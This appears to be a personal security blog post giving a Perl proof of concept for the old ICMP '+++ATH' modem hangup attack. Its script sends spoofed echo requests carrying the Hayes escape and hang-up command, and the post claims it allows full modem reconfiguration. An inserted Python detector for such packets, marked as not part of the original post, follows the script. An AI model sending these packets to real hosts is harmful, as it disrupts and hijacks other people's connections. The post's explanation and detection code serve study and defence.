ICMP Modem Hangup – DoS (RCE)

Yes, this might come as a spoiler, but Mathias, Kasper and I are currently researching in the cellular area.
Enough of that at the moment.

Anyway, whilst we read through RFCs and wiki pages, we stumbled upon this specific page containing:

"(...) this eventually (when modems began to be used to dial up to the Internet) led to a nasty denial-of-service attack involving an ICMP echo request ("ping") packet containing three pluses and ATH, the hangup command."

I've heard about this before, but I simply had to write a Proof of Concept, so here's a short Perl script for your enjoyment:

#!/usr/bin/perl
# By: Fredrik Nordberg Almroth
# URL: http://h.ackack.net/
use strict;
use warnings;
use Net::RawIP;

# Source and destination addresses; both can be overridden from the command line.
my $saddr = shift || '1.3.3.7';
my $daddr = shift || '192.168.0.1';

my $packet = Net::RawIP->new({ icmp => {} });
$packet->set({
  ip => {
    saddr => $saddr,
    daddr => $daddr
  },
  icmp => {
    type => 0x8,   # ICMP echo request ("ping")
    code => 0x0,
    data => "\x2B\x2B\x2B\x41\x54\x48\x0D\x0A"   # "+++ATH\r\n"
  }
});
print "[>] Sending 5 packets...\n";
$packet->send(0x1, 0x5);   # delay of 1 second between packets, 5 packets in total
print "[~] Done!\n";

The hexadecimal gibberish "\x2B\x2B\x2B\x41\x54\x48\x0D\x0A" simply stands for: +++ATH followed by a line break (carriage return and line feed).

I believe you're not that familiar with the Hayes AT command set, so here's a short description of what it does.

The +++ switches the modem from data mode into command mode, which is pretty bad.
The AT part of the string says "Hey, I wish to execute a command!", and the H stands for "Hang up".

I believe you see the DoS scenario in this script.
But it doesn't stop there: it's possible to reconfigure the target modem completely.
So this isn't just a DoS, it's a whole command execution scenario!
Nice, huh?
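For the defending side, here is an added example (my own code, not part of the original post) of the check a packet filter or IDS rule in front of a dial-up link would implement: parse a raw IPv4/ICMP packet, verify the ICMP checksum, and flag echo requests whose data carries the +++ATH sequence. The packet builder and the two sample packets are constructed in memory purely to exercise the detector.

```python
import struct

ICMP_ECHO_REQUEST = 8
HAYES_HANGUP = b"+++ATH"  # escape sequence + hang-up command from the post; CR/LF optional

def inet_checksum(data: bytes) -> int:
    """RFC 1071 one's-complement sum over 16-bit words (odd length zero-padded)."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return ~total & 0xFFFF

def parse_ipv4_icmp(frame: bytes):
    """Return (src, dst, type, code, payload) for a well-formed IPv4/ICMP packet, else None."""
    if len(frame) < 28 or frame[0] >> 4 != 4 or frame[9] != 1:
        return None
    icmp = frame[(frame[0] & 0x0F) * 4:]
    if inet_checksum(icmp) != 0:  # damaged or forged checksum: not a valid ICMP message
        return None
    src = ".".join(map(str, frame[12:16]))
    dst = ".".join(map(str, frame[16:20]))
    return src, dst, icmp[0], icmp[1], icmp[8:]

def is_modem_hangup_ping(frame: bytes) -> bool:
    """True if the frame is an ICMP echo request whose data carries +++ATH."""
    parsed = parse_ipv4_icmp(frame)
    if parsed is None:
        return False
    _src, _dst, itype, _code, payload = parsed
    # AT commands are case-insensitive and the modem watches the whole data stream,
    # so match anywhere in the payload regardless of case.
    return itype == ICMP_ECHO_REQUEST and HAYES_HANGUP in payload.upper()

def build_echo_request(src: str, dst: str, payload: bytes) -> bytes:
    """Constructed sample (not a capture): minimal IPv4 header + ICMP echo request."""
    icmp = struct.pack("!BBHHH", ICMP_ECHO_REQUEST, 0, 0, 0x1234, 1) + payload
    icmp = icmp[:2] + struct.pack("!H", inet_checksum(icmp)) + icmp[4:]
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(icmp), 0, 0, 64, 1, 0,
                     bytes(map(int, src.split("."))), bytes(map(int, dst.split("."))))
    return ip + icmp

# Constructed samples: the post's payload versus an ordinary ping payload.
HANGUP_PING = build_echo_request("1.3.3.7", "192.168.0.1", b"\x2B\x2B\x2B\x41\x54\x48\x0D\x0A")
BENIGN_PING = build_echo_request("192.168.0.2", "192.168.0.1", b"abcdefghijklmnop")

if __name__ == "__main__":
    for name, pkt in (("hangup", HANGUP_PING), ("benign", BENIGN_PING)):
        print(name, is_modem_hangup_ping(pkt))
```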

Now back to whatever I was doing,
Ciao!

Hey, I'm Fredrik. I'm from Sweden, born 1990, and I have a huge interest in information technology and information security. So far, I've been studying for three years at the International IT College of Sweden and one year at the Royal Institute of Technology (Kista, Sweden). I'm one of the co-founders of Detectify. I'm working closely together with the Swedish firm Young & Skilled. ...Not to forget, I'm the previous founder of Arctic Security. If you wish to contact me, please email me at h@ackack.net or follow me on Twitter @Almroot.
